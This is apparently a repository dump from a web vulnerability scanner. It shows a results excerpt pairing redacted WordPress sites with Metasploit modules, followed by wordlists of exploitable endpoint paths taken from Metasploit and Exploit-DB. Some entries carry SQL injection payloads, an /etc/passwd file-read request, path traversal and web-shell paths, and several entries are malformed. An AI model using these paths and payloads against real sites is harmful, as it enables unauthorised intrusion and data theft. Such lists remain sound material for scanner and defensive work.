3.0] 127 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 128 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 129 | 130 | [Found] https://[redacted] [Wordpress 3.8.26] 131 | Wordpress XMLRPC DoS [auxiliary/dos/http/wordpress_xmlrpc_dos] 132 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 133 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 134 | 135 | [Found] https://[redacted] [Wordpress 3.9.9] 136 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 137 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 138 | 139 | [Found] https://[redacted] [Wordpress 3.3] 140 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 141 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 142 | ``` 143 | 144 | -------------------------------------------------------------------------------- /msfPaths.txt: -------------------------------------------------------------------------------- 1 | /ayefeaturesconvert.js 2 | /portal 3 | /dolibarr 4 | /drupal 5 | /userinfo/search 6 | /stmeetings 7 | /forum 8 | /opennms 9 | /zabbix 10 | /_all_dbs 11 | /courier/intermediate_login.html 12 | /admin/index.jsp 13 | /crowd/services 14 | /axis2/services/listServices 15 | /axis2/axis2-admin/login 16 | /cgi-mod/view_help.cgi 17 | /bitweaver 18 | /caidao.php 19 | /clansphere 20 | /clansphere_2011.3 21 | /data/login 22 | /cgi-bin/dna 23 | /.git 24 | /imc 25 | /SiteScope 26 | /db 27 | /VPortal/mgtconsole/CheckPassword.jsp 28 | /status 29 | /jenkins 30 | /eng 31 | /mediawiki 32 | /admin.php 33 | /api/users/login 34 | /provision/index.php 35 | /rips 36 | /s40 37 | /.svn 38 | /admin/j_security_check 39 | /manager/html 40 | /vcms2 41 | /www 42 | /session 43 | /sap/bc/soap/rfc 44 | /bvsmweb 45 | /ATutor 46 | /centreon 47 | /v2/apps 48 | /cgi-bin/chpasswd.cgi 49 | /iControl/iControlPortal.cgi 50 | /ping.ccp 51 | /pandora_console 52 | /components/system/configuration/functions.php 53 | /railo-context 54 | /v1/projects 55 | /RPC2 56 | /spywall/pbcontrol.php 57 | /vcms 58 | /WebCalendar 59 | /WebCalendar-1.2.4 60 | /WeBid 61 | /AjaXplorer 62 | /AjaXplorer-2.5.5 63 | /roller 64 | /appRain 65 | /appRain-q-0.1.5 66 | /Auxiliumpetratepro 67 | /cuteflow 68 | /cuteflow_v.2.11.2 69 | /com_extplorer 70 | /com_extplorer_2.1.0 71 | /gestioip 72 | /glossword/1.8 73 | /glpi 74 | /openadmin 75 | /jmx-console 76 | /invoker/JMXInvokerServlet 77 | /admin-console/login.seam 78 | /kordil_edms 79 | /log1cms2.0 80 | /wiki 81 | /mma.php 82 | /mobilecartly 83 | /moodle 84 | /mt 85 | /interface 86 | /openx 87 | /wls-wsat/CoordinatorPortType 88 | /Phoenix/includes/geoip.php 89 | /php-utility-belt/ajax.php 90 | /bf102 91 | /phpFileManager/index.php 92 | /phpFileManager-0.9.8/index.php 93 | /phpmyadmin 94 | /phptax 95 | /phpwiki 96 | /polarbearcms 97 | /qdPM 98 | /missing404 99 | /sflog 100 | /struts2-showcase 101 | /struts2-rest-showcase/orders/3 102 | /struts2-blank/example/HelloWorld.action 103 | /blank-struts2/login.action 104 | /IDC.php 105 | /sysaid 106 | /testlink-1.9.3 107 | /manager 108 | /jos.php 109 | /vtigercrm 110 | /console 111 | /wikka 112 | /x7chat2 113 | /Zemra/Panel/Zemra/system/command.php 114 | /zenworks 115 | /zpanel 116 | /do/view/Main/WebHome 117 | /lite 118 | /basilic 119 | /basilic-1.5.14 120 | /index.php 121 | /sample 122 | /chat 123 | /GetSimpleCMS 124 | /hastymail2 125 | /horde 126 | /hybridauth 127 | /forums 128 | /joomla 129 | /kimai 130 | /librettoCMS 131 | /librettoCMS_v.2.2.2 132 | /nagios3/cgi-bin/history.cgi 133 | /narcissus-master 134 | /php-ofc-library 135 | /openemr 136 | /opensis 137 | /php-charts 138 | /php-charts_v1.0 139 | /phpcollab 140 | /pp088 141 | /ProjectSend 142 | /seportal 143 | /simple_e_document 144 | /simple_e_document_v_1_31 145 | /cgi-bin/mt 146 | /sugarcrm 147 | /tiki 148 | /vicidial 149 | /webtester5 150 | /xoda 151 | /zimbraAdmin 152 | /zm 153 | /cms400min 154 | /cgi-bin/function.php?argument= 155 | /autopass 156 | /ws/control 157 | /ctc/servlet 158 | /d4d/statusFilter.php 159 | /TrackItWeb 160 | /umbraco 161 | /mantisbt 162 | /struts2-showcase/integration/saveGangster.action 163 | /version 164 | /HtmlAdaptor 165 | /HtmlAdaptor 166 | /rest/v1/AccountService/Accounts 167 | /servicedesk/servicedesk/servicedesk.nocache.js 168 | /servicedesk/servicedesk 169 | /servicedesk/servicedesk/accountSerivce.gwtsvc 170 | /miq_policy/explorer 171 | /index.php/component/users/ 172 | /dashboard 173 | /cgi-bin/tmUnblock.cgi 174 | /interface/index.do 175 | /userSession.do 176 | /data/config/image.do 177 | /telpho/temp/telpho10.epb 178 | /rtc/post/ 179 | /cgi-bin/authLogin.cgi 180 | /user/login 181 | /_users/_all_docs 182 | /English/pages_MacUS/lan_set_content.html 183 | /events/reports/view.cgi 184 | /index.php 185 | /_snapshot/pwn 186 | /_snapshot/pwnie 187 | /login.jsf 188 | /login.jsf 189 | /login.jsf 190 | /windows/code.php 191 | /login 192 | /modules/common/logs 193 | /services/listServices 194 | /services/listServices 195 | /workorder/FileDownload.jsp 196 | /en-US/app/launcher/home 197 | /j_security_check 198 | /WorkOrder.do 199 | /posts 200 | /dukapress/lib/dp_image.php 201 | /gi-media-library/download.php 202 | /mTheme-Unus/css/css.php 203 | /admin.php 204 | /tools.php 205 | /options-general.php 206 | /showcallfwd.cgi 207 | /phonecallfwd.cgi 208 | /showcallfwdperline.cgi 209 | /index.php 210 | /login.php 211 | /cgi-bin/ping.sh 212 | /ossim/action/getaction.php 213 | /ossim/policy/policy.php 214 | /ossim/policy/newpolicy.php 215 | /ossim/conf/reload.php 216 | /ossim/action/modifyactions.php 217 | /ossim/action/getaction.php 218 | /ossim/policy/policy.php 219 | /ossim/policy/newpolicy.php 220 | /ossim/policy/getpolicy.php 221 | /ossim/conf/reload.php 222 | /ossim/session/token.php 223 | /ossim/policy/deletepolicy.php 224 | /ossim/action/deleteaction.php 225 | /continuum/about.action 226 | /en/content/index.php 227 | /en/logon.php 228 | /en/database/import.php 229 | /upload 230 | /ping.html 231 | /agent/linuxpkgs 232 | /img/favicon.png?v=6.0.1-1213 233 | /cgi-bin/setConfigSettings 234 | /cgi-bin/webcm 235 | /josso/signon/login.do 236 | /display.php 237 | /tmUnblock.cgi 238 | /interface/index.do 239 | /m 240 | /nagiosxi/ 241 | /nagiosxi/admin/components.php 242 | /anyterm.html 243 | /anyterm-module 244 | /index.php 245 | /mobile/index.php 246 | /images 247 | /php/utils/router.php/Administrator.get 248 | /spywall/login.php 249 | /spywall/ipchange.php 250 | /spywall/login.php 251 | /spywall/blocked_file.php 252 | /spywall/login.php 253 | /spywall/releasenotes.php 254 | /spywall/login.php 255 | /redirect.cgi 256 | /login.imss 257 | /initCert.imss 258 | /saveCert.imss 259 | /tools_command.php 260 | /includes/inline_image_upload.php 261 | /WANem/result.php 262 | /includes/settings.php 263 | /docs/changes.txt 264 | /cgi-bin/rdfs.cgi 265 | /httpmon.php 266 | /scripts.php 267 | /scripts_exec.php 268 | /login.cgi 269 | /_search 270 | /_search 271 | /jetspeed/login/redirector 272 | /jetspeed/portal/Administrative/site.psml 273 | /addons/uploadify/uploadify.php 274 | /mods/_core/modules 275 | /axis2-admin/login 276 | /themes/dashboard/assets/plugins/jquery-file-upload/server/php 277 | /files/php_pagename 278 | /readme 279 | /actions/beats_uploader.php 280 | /actions/pdir/pname 281 | /event/index3.do 282 | /event/agentUpload 283 | /agentUpload 284 | /new 285 | /gw_login.php 286 | /gw_admin.php?a=edit-own&t=users 287 | /servlet/Main 288 | /j_security_check 289 | /proxy/ssllogin 290 | /global_group_login.php 291 | /userpictures 292 | /admin/libraries/ajaxfilemanager/ajax_create_folder.php 293 | /admin/libraries/ajaxfilemanager/inc/data.php 294 | /examples/save.lsp 295 | /login_page.php 296 | /my_view_page.php 297 | /LiveTime/WebObjects/LiveTime.woa 298 | /LiveTime 299 | /www/delivery/fc.php 300 | /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector 301 | /admin/Login.do 302 | /olt/Login.do 303 | /install.php 304 | /index.php 305 | /index.php 306 | /images 307 | /mods/documents/uploads/ 308 | /includes/jquery.uploadify/upload.php 309 | /SGPAdmin/fileRequest 310 | /appliance/applianceMainPage 311 | /appliance 312 | /errorInSignUp.htm 313 | /Login.jsp 314 | /ChangePhoto.jsp 315 | /login.php 316 | /upload_area 317 | /upload_area/nodes_hierarchy 318 | /wizards/post2file.php 319 | /wizards 320 | /main.php 321 | /index.php 322 | /index.php?loggedout 323 | /wizards/post2file.php 324 | /ajax/jsonQuery.php 325 | /Admin/archive/ArchiveCache 326 | /Admin/archive/upload.jsp 327 | /servlets/FileUploadServlet 328 | /jsp 329 | /wikka.php 330 | /spamlog.txt.php 331 | /etc/apps/phpmyadmin/index.php 332 | /etc/apps/phpmyadmin/import.php 333 | /system_groupmanager.php 334 | /cgi-bin/vmtadmin.cgi 335 | /scripts/upload.php 336 | /admin_area/charts/ofc-library/ofc_upload_image.php 337 | /admin_area/charts/tmp-upload-images 338 | /egallery/uploadify.php 339 | /upload.php 340 | /admin/CHANGES 341 | /admin/config.php 342 | /havalite/upload.php 343 | /install.php 344 | /config.php 345 | /nagiosxi/includes/components/graphexplorer/visApi.php 346 | /nagiosxi/index.php 347 | /ofc_upload_image.php 348 | /interface/login/login.php 349 | /interface/main/main_screen.php 350 | /interface/new/new_comprehensive_save.php 351 | /interface/super/manage_site_files.php 352 | /sites/default/images 353 | /interface/login/login.php 354 | /library/openflashchart/php-ofc-library/ofc_upload_image.php 355 | /library/openflashchart/tmp-upload-images 356 | /index.php 357 | /login.php 358 | /staticpages.php 359 | /admin/downloads.php 360 | /data/down_media 361 | /upload.php 362 | /service/v4/rest.php 363 | /index.php 364 | /admincp/ 365 | /install2.php 366 | /ajax-load-more/core/repeater 367 | /foxypress/uploadify/uploadify.php 368 | /affiliate_images 369 | /front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo 370 | /infusionsoft/Infusionsoft/utilities/code_generator.php 371 | /uploads/slideshow-gallery 372 | /cgi-bin/kerbynet 373 | /registresult.htm 374 | /cs/pdfupload 375 | /scripts 376 | /upload/upload 377 | /upload 378 | /login.jsf 379 | /webdm/mibbrowser/mibFileUpload 380 | /ServiceEmulation/services/EmulationAdmin 381 | /ServiceEmulation 382 | /servlet/Main 383 | /jsp/tabs.jsp 384 | /rest/collectors/1.0/tempattachment 385 | /SystemTab/uploadImage.asp 386 | /mve/upload/gfd 387 | /LoginPage.do 388 | /api/json/admin/SubmitQuery 389 | /jsp/Login.do 390 | /fileUpload.do 391 | /wlevs/visualizer/upload 392 | /ohw/help/state 393 | /rest/action 394 | /LoginServlet 395 | /Installers 396 | /cbmui/images 397 | /event/index3.do 398 | /event/runQuery.do 399 | /event/j_security_check 400 | /jsp_name 401 | /vtapi/v2/file/scan 402 | -------------------------------------------------------------------------------- /dev/sqlPaths.txt: -------------------------------------------------------------------------------- 1 | /friend-profile.php?id= 2 | /gallery/upload.php 3 | /gbx/index.php 4 | /genre_artists.php 5 | /go_login/validate_credentials/admin/ 6 | /holiday.php 7 | /holiday.php?hid= 8 | /holiday_book.php?hid=1 9 | /home.php 10 | /ig-calendar/user.php?id= 11 | /ig_shop/cart.php?action= 12 | /ig_shop/compare_product.php?id=1 13 | /ig_shop/page.php 14 | /ig_shop/page.php?action= 15 | /image_gallery.php 16 | /imgallery/galeria.php?start=0 17 | /imgallery/popup/koment.php?id_phot= 18 | /imgallery/popup/opis.php?id_phot= 19 | /inc/admin_design.inc.php 20 | /inc/design.inc.php 21 | /inc/elementz.php 22 | /inc/elementz.php?lilil=400&ubild=hacker&pa=hacker 23 | /inc/usercp.php?action=newpass&id=1 24 | /index php go addpage" 25 | /index.asp 26 | /index.asp?tID= 27 | /index.asp?view=archive&day= 28 | /index.php 29 | /index.php/component/quran/index.php 30 | /index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER] 31 | /index.php/go_site/cpanel/ 32 | /index.php/go_site/cpanel/$type/$action 33 | /index.php?action=collection.imageview&id= 34 | /index.php?custom_language=turkish&user=detaliespopupcondrent&pid= 35 | /index.php?m=video 36 | /index.php?m=video&v= 37 | /index.php?mode=viewuser 38 | /index.php?option=com_hmcommunity&view=fnd_home&id= 39 | /index.php?option=com_jbook 40 | /index.php?option=com_jbuildozer 41 | /index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid= 42 | /index.php?p= 43 | /index2.php?option=com_airmonoblock&task=focus&id=1 and 1=1 44 | /indir.php?id=-1 45 | /install/index.php 46 | /ixxo-cart-plus-demo/index.php?p=catalog&parent= 47 | /jobdetails.php?pr_id= 48 | /jobs/ 49 | /jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20 50 | /jobsearchengine/show_search_result.php 51 | /jobsearchengine/show_search_result.php?keyword= 52 | /joomla/index.php 53 | /joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano= 54 | /kb/index.html 55 | /kb/index.html?ToDo=browse 56 | /kubelance/profile.php 57 | /kubelance/profile.php?id= 58 | /labs/module_fichier/upload/upload_filemanager.php 59 | /labs/module_fichier/upload/upload_filemanager.php?dossierup=testing 60 | /labs/stock_fichiers/tmp/ 61 | /labs/stock_fichiers/tmp/ 62 | /land.php', "/land.php?file=edit_config&config_id=1 63 | /latest.php?nid=9 64 | /latest_news_details.php?id= 65 | /lib/base.php 66 | /list.php?Active= 67 | /list.php?pagenum=0&categoryid= 68 | /list_tagitems.php 69 | /lista_anexos.php?tsk_id= 70 | /listing.php 71 | /listing.php?id= 72 | /lyrics_menu/lyrics_song.php 73 | /machform/view.php 74 | /main.php 75 | /main.php?section=UserContainer&subsection=add&id=0 76 | /memory.php?board_user_cook=1 77 | /message_box.php 78 | /message_box.php?theme=&l=[ 79 | /messages.php 80 | /messages.php?forum=1&action=view&mid= 81 | /microweber/api/checkout 82 | /mobius_path/detail.php 83 | /mobius_path/detail.php?t=exhibitions&type=exh&f=&s= 84 | /mod.php 85 | /modules MyAnnonces index php pa view" 86 | /modules-php-name-Siir 87 | /modules.php 88 | /modules/backup/backup-sql.php 89 | /modules/eEmpregos/index.php 90 | /modules/eEmpregos/index.php?pa=view 91 | /modules/mod.php?mod= 92 | /modules/mpay24/confirm.php 93 | /modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+ 94 | /modulesmapy24/api/curllog.log 95 | /monstra/admin/index.php 96 | /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de 97 | /topic.php 98 | /topic.php?CAT_ID=1&FORUM_ID=1&TOPIC_ID= 99 | /topics.php 100 | /toplists.php 101 | /torrents.php 102 | /torrents.php?mode=category 103 | /trade/tradeCategory.php?id= 104 | /tutorial/machform.rar 105 | /typo3/index.php 106 | /typo3/jobs/ 107 | /u5cms/u5admin/deletefile.php 108 | /ulisse/ladder.php 109 | /upload/holiday/hi9223test.php 110 | /uploads/upload.php 111 | /userDetail.php 112 | /vb/bnnr.php 113 | /vb/bnnr.php" 114 | /view.php 115 | /view.php=XX -o XX.out 116 | /view/objectDetail.php 117 | /viewfullprofile1.php 118 | /viewmsg.php 119 | /viscacha/admin.php 120 | /viscacha/admin.php?action=bbcodes&job=censor 121 | /viscacha/pm.php 122 | /w3.php 123 | /wallpaper.php?wallpaperid=1 124 | /wb/admin/login/index.php 125 | /wb/pages/addon.php 126 | /wdcalendar/edit.php" 127 | /webCal3_detail.asp 128 | /webadmin/auth/verification.php 129 | /webadmin/deny/index.php 130 | /webapps/dc/doceboCore/index.php?modname=iotask&op=display&addconnection&gotab=connections 131 | /webboard/admindel.php 132 | /webid/admin/ 133 | /webid/eledicss.php 134 | /webid/logs/cron.log 135 | /whmcs5214/viewinvoice.php 136 | /winducms/admin/content/edit/659/ 137 | /wizards/get2post.php 138 | /wizards/get2post.php?file_name= 139 | /wordpress/pdb-signup/ 140 | /wordpress/wp-admin/admin.php 141 | /wp-admin/admin-ajax.php 142 | /wp-admin/admin.php 143 | /wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc 144 | /wp-content/plugins/cpl/cplphoto.php 145 | /wp-content/plugins/ocim-mp3/source/pages.php 146 | /wp-content/plugins/wp-symposium/ajax/mail_functions.php 147 | /yamamah/index.php 148 | /year2005.php?id= 149 | /yourfalt4/admin/index.php 150 | /zabbix 151 | /zaznam.php?detail_num= 152 | /seotoaster/go 153 | /service-list?city= 154 | /shop.htm 155 | /shop.php 156 | /shopcart/index.php 157 | /show_memorial.php?id= 158 | /show_news.php?news_id= 159 | /show_profile.php?custid=1 160 | /single-video-detail.php?video_id=MTMy&report_videos[]= 161 | /skin_shop/standard/2_view_body/body_default.php 162 | /sn_news/admin/login.htm 163 | /snews/visualiza.php 164 | /sniff.jpg 165 | /sounds/go_bogus.wav.php 166 | /state.php 167 | /story.php 168 | /student/stu-master/view 169 | /stuworkdisplay.php 170 | /tables.php 171 | /templates1/view_product.php 172 | /text.php 173 | /textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty= 174 | /themes/admin/default/modules/show.php 175 | /tiki-list_blogs.php 176 | /tiki-usermenu.php 177 | /page_new.php?id= 178 | /page_show.php?id= 179 | /pages.php?id=1 180 | /paidbanner.php?ID= 181 | /patch/?a= 182 | /path]

183 | /path_to_cp/edit_email.php 184 | /phpMyAdmin/ 185 | /phpaccounts/index.php 186 | /phpaccounts/users/1/ 187 | /phpaccounts/users/1/backdoor.php 188 | /phpagenda/ 189 | /phpagenda/?deleteEvent=2 190 | /phpinc/news.php?do= 191 | /phpipam/app/admin/instructions/preview.php 192 | /phpplanner/manage.php 193 | /phpplanner/manage.php?stamp=cP 194 | /phpplanner/notice.php 195 | /phpplanner/user_edit.php 196 | /picture.php?id= 197 | /post.php 198 | /post.php?action=reply&tid=2517&repquote= 199 | /print.php 200 | /printable_pedigree.php 201 | /priv.php 202 | /priv.php?command=reply&id= 203 | /product.php 204 | /product_detail.php?cid=9&pid=-1 205 | /product_reviews_info.php?products_id= 206 | /product_view1.php 207 | /product_view1.php?pid= 208 | /products/shaadi/keywordresult.php 209 | /profile_social.php?id= 210 | /prog.php 211 | /psys/chatbox.php?showid= 212 | /public/backoffice 213 | /public/backoffice 214 | /public/view.php?storyid=-1 215 | /qti_usr.php?id=4 216 | /question/ 217 | /readmore.php?news_id= 218 | /real/search.php 219 | /real/search.php?price_from= 220 | /recipe.php?recipeid=-1 221 | /recipes.php 222 | /redaxo/index.php 223 | /redaxo/index.php?page=mediapool%2fmedia&rex_file_category=0&media_name=blub&undefined= 224 | /remotereporter/load_logfiles.php 225 | /reviews.php?id= 226 | /revou/adminlogin/index.php 227 | /revou/adminlogin/index.php?id=dbimport 228 | /revou/db_backup/shell.php 229 | /rix/add-site.php 230 | /rix/add-site.php?do=addnew&go=add 231 | /s-cms/viewforum.php?id= 232 | /script_demo/make_or_break/admin/login.php 233 | /scripts/autocar_preview/ 234 | /scripts/autocar_preview/search-cars 235 | /search 236 | /search.php 237 | /search/?action=index 238 | /searchbycat_list.php?catid= 239 | page.php?id= 240 | /page.php?pid=n 241 | /pageDetail.php?pid= 242 | /news.html 243 | /news.php 244 | /news.php4?nid= 245 | /news.php?id=-1&c_id= 246 | /news.php?view=3 247 | /news/index.php 248 | /news/index.php?shownews= 249 | /news_detail.asp 250 | /news_detail.asp?id=1 251 | /news_details.php 252 | /news_details.php?id= 253 | /notes.php 254 | /notice.php 255 | /notice.php?msg= 256 | /noticias.php?notiId= 257 | /oc-login.php 258 | /ocsreports/index.php 259 | /ocsreports/index.php?function=visu_search 260 | /opacsql2_0 261 | /option=com_education_classes 262 | /option=com_onismusic 263 | /ossim/report/wizard_run.php 264 | /p3/index.php?option=com_tophotelmodule 265 | /music/buycd.php 266 | /music/buycd.php?HTTP_DOCUMENT_ROOT= 267 | /myLDlinker.php 268 | /myLDlinker.php?url= 269 | /mycrocms/mycrocms/ 270 | /mycrocms/mycrocms/?entry_id= 271 | /mysar/www/ 272 | /mysar/www/?a=administration 273 | /eventcalendar/admin.php 274 | /eventcalendar/admin.php?act=options&cal_id= 275 | /eventscriptphp/eventscript.php?id= 276 | /faethon/admin/articles/edit.php 277 | /faethon/admin/articles/edit.php?mainpath= 278 | /faethon/admin/index.php 279 | /faethon/admin/index.php?mainpath=[ 280 | /faethon/mobile/index.php 281 | /faethon/mobile/index.php?mainpath= 282 | /fake.png 283 | /falt4/ 284 | /familynews.php 285 | /featured_article.php?mode=detail&page=search&artid= 286 | /filebase.php" "Powered by phpBB" 287 | /filmis/cat.php?nb= 288 | /fixed_page.asp?id= 289 | /fiyo/dapur/apps/app_article/controller/article_list.php?cat= 290 | /fiyo/dapur/apps/app_user/controller/check_user.php 291 | /fiyo/dapur/index.php?app=user&act=edit&id=1 292 | /fiyo/plugins/plg_kcfinder/browse.php 293 | /fiyo/plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download 294 | /flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key= 295 | /flash/read.php?id=1 296 | /food/ 297 | /forcedownload.php?file= 298 | /forum.php 299 | /forum/index.php 300 | /forums/index.php 301 | /friend-profile.php 302 | /actionphp/action.input.php 303 | /actionphp/download.File.php?&file= 304 | /adaptcms/admin/adaptbb/webroot/foo 305 | /adaptcms/admin/categories/add 306 | /adaptcms/admin/fields/ajax_fields/ 307 | /adaptcms/admin/links/links/add 308 | /adaptcms/admin/tools/create_theme 309 | /adaptcms/admin/tools/create_theme?finish=true 310 | /adaptcms/forums/off-topic/new 311 | /adcbrowres.php 312 | /adcbrowres.php?lang=english&cat= 313 | /address_book/contacts.php 314 | /address_book/contacts.php?var1= 315 | /addressbook.php 316 | /addressbookv7.0.0/edit.php 317 | /addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1) 318 | /addressbookv7.0.0/group.php/ 319 | /addressbookv7.0.0/index.php?group=' 320 | /addressbookv7.0.0/preferences.php?from= 321 | /addressbookv7.0.0/view.php?id=1 322 | /admin 323 | /admin-aps 324 | /admin.php 325 | /admin.php?action=bbcodes 326 | /admin.php?mode=edit 327 | /admin.php?page=cat_options§ion=status 328 | /admin/edituser.php 329 | /admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3* 330 | /admin/helper/updateUser.php\\ 331 | /admin/index.asp 332 | /admin/index.php 333 | /admin/index.php 334 | /admin/managepoll.php 335 | /admin/managerrelated.php 336 | /admin/managersection.php 337 | /admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7§ionID=1* 338 | /admin/options_name_manager.php 339 | /admin/options_name_manager.php?option_page=1&option_order_by=/[ EXPLOIT ] 340 | /admin/record_company.php or Extras > Record Companies 341 | /admin/remove.php 342 | /admin/success_story.php 343 | /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http:/huh? 344 | /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http:/huh? 345 | /admins/login.htm 346 | /admins/login.php 347 | /advertise_detail.php 348 | /advertise_detail.php?id= 349 | /advsearch.php', "/advsearch.php?lang= 350 | /agenda/indexdate.php?ids= 351 | /alitalk/inc/receivertwo.php?uid=1 352 | /app/bin/etpproxy_v15 353 | /archive.php 354 | /archives.php 355 | /archives.php?pid=null 356 | /article_details.php 357 | /article_details.php?sbiz_id= 358 | /articlefr/register/ 359 | /atutor/links/index.php?desc= 360 | /auktionshaus/news.php 361 | /auktionshaus/news.php?id= 362 | /auth/admin/adminprocess.php 363 | /auth/process.php 364 | /backlinkspider.php" 365 | /bilboblog/admin/homelink.php 366 | /bilboblog/admin/homelink.php?url= 367 | /bilboblog/admin/login.php 368 | /blog.php 369 | /blog.php?blogid= 370 | /bncwi/index.php 371 | /boutique/ 372 | /browse-category.php 373 | /browse-scategory.php 374 | /browsecats.php?cid= 375 | /buyer/index.php 376 | /buyer/index.php?ProductID=&BuyerID= 377 | /bview.asp 378 | /calendar.php 379 | /calendar/userinfo.php?userid= 380 | /cat1.php?catID= 381 | /categories 382 | /categories?subctid= 383 | /category_edit.php 384 | /cid "modules/eEmpregos" 385 | /citrusdb/tools/index.php 386 | /citrusdb/tools/index.php?load=importcc&submit=on 387 | /classifide_ad.php?item_id= 388 | /classified-listing.php 389 | /classifieds.php 390 | /clip/index.php 391 | /clip/index.php?v= 392 | /cms/ 393 | /cms/index.pl 394 | /cms/process.php 395 | /com_5starhotels 396 | /com_candle" 397 | /com_dms" 398 | /com_dshop 399 | /com_equipment 400 | /com_extcalendar 1 401 | /com_fq" 402 | /com_gamesbox 403 | /com_idoblog" 404 | /com_jabode 405 | /com_jejob 406 | /com_jepoll 407 | /com_kochsuite 408 | /com_linkdirectory 409 | /com_mamml" 410 | /com_neoreferences 411 | /com_team 412 | /comment.asp 413 | /comments.php?entry= 414 | /component/joomanager/ 415 | /component/joomanager/?view=itemslist&catid= 416 | /components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php 417 | /components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php 418 | /contact_view.php 419 | /contact_view.php?contact= 420 | /customprofile.php 421 | /customprofile.php?id= 422 | /database/Blog.mdb 423 | /deface.htm 424 | /demo/ 425 | /detail.php?id=1 426 | /details.php 427 | /details.php?prodId= 428 | /domphp/agenda/indexdate.php?id= 429 | /e/enews/index.php 430 | /e107_plugins/lyrics_menu/lyrics_song.php 431 | /edCss.php?css_str= 432 | /edit.php?entries= 433 | /edituser.php?Active=index&action=details&ID= 434 | /edmobbs9r.php?messageID=1&table= 435 | /engine/new_event.php 436 | /enquiry_detail.php?rID= 437 | 438 | -------------------------------------------------------------------------------- /exploitdb_others.txt: -------------------------------------------------------------------------------- 1 | /+CSCOU+/../+CSCOE+/files/file_list.json?path=/ 2 | /.photon/pwm/pwm.menu 3 | /.photon/voyager/config.full 4 | /.photon/voyager/history.html 5 | /.photon/voyager/hotlist 6 | /0/config/set 7 | /AdminTools/querybuilder/ie.jsp 8 | /AdminTools/querybuilder/logonform.jsp 9 | /AnalyticalReporting/querywizard/jsp/apply.jsp 10 | /AnalyticalReporting/querywizard/jsp/query.jsp 11 | /AnalyticalReporting/querywizard/jsp/turnto.jsp 12 | /Asoquu3e.html 13 | /CFIDE/adminapi/administrator.cfc 14 | /CFIDE/administrator/enter.cfm 15 | /CFIDE/administrator/scheduler/scheduleedit.cfm 16 | /CFIDE/administrator/scheduler/scheduletasks.cfm 17 | /CFIDE/main/ide.cfm 18 | /CON 19 | /CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y 20 | /CPUCommands 21 | /CommentAPI/ 22 | /CrystalReports/jsp/CrystalReport_View/viewReport.jsp 23 | /DB4Web/ 24 | /ESAdmin/collection.do 25 | /Example.swf 26 | /Example_controller.swf 27 | /ForensicsAnalysisServlet/ 28 | /Forms/login1 29 | /Guide/ 30 | /HNAP1/ 31 | /HPSSA/index.htm 32 | /IPn4G.config 33 | /InfoViewApp/jsp/common/actionNavFrame.jsp 34 | /Local/console/cmhome.htm 35 | /MyStruts.action 36 | /OA_HTML 37 | /OA_HTML/OA.jsp 38 | /OA_HTML/RF.jsp 39 | /OBCR&OC 40 | /OvCgi/OpenView5.exe 41 | /PerformanceManagement/jsp/aa-display-flash.jsp 42 | /PerformanceManagement/jsp/alertcontrol.jsp 43 | /PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp 44 | /PerformanceManagement/jsp/sb/roleframe.jsp 45 | /PerformanceManagement/jsp/viewError.jsp 46 | /PerformanceManagement/jsp/viewWebiReportHeader.jsp 47 | /PerformanceManagement/jsp/wait-frameset.jsp 48 | /PerformanceManagement/scripts/docLoadUrl.jsp 49 | /PermaLink.aspx 50 | /PlatformServices/preferences.do 51 | /Portal/Portal.mwsl 52 | /RealFolder 53 | /SOAPWrapperCommon_UsersWS_GetServers_Wrapper 54 | /STATE_ID/31337/jsp/xmlhttp/persistence.jsp 55 | /Secure/Local/console/install_upload_action/crl_format 56 | /SetupReceipt.html 57 | /SomeAction.action 58 | /TopAccess/Administrator/Setup/ScanToFile/List.htm 59 | /WEB-INF/ 60 | /account/index.jsp 61 | /action=chooseDirectory¤tPath 62 | /admin-serv/tasks/configuration/ViewLog 63 | /admin/ 64 | /admin/auth.adduser.html 65 | /admin/includes/ 66 | /admin/index.jsp 67 | /admin/management.shtml 68 | /admin/queueBrowse/example.A 69 | /admin/queues.jsp 70 | /admin/topics.jsp 71 | /ads-readerext/ads-readerext 72 | /alfresco/cmisbrowser 73 | /alfresco/proxy 74 | /altercast/AlterCast 75 | /amserver/UI/Login 76 | /anything.jsp 77 | /app/index.html 78 | 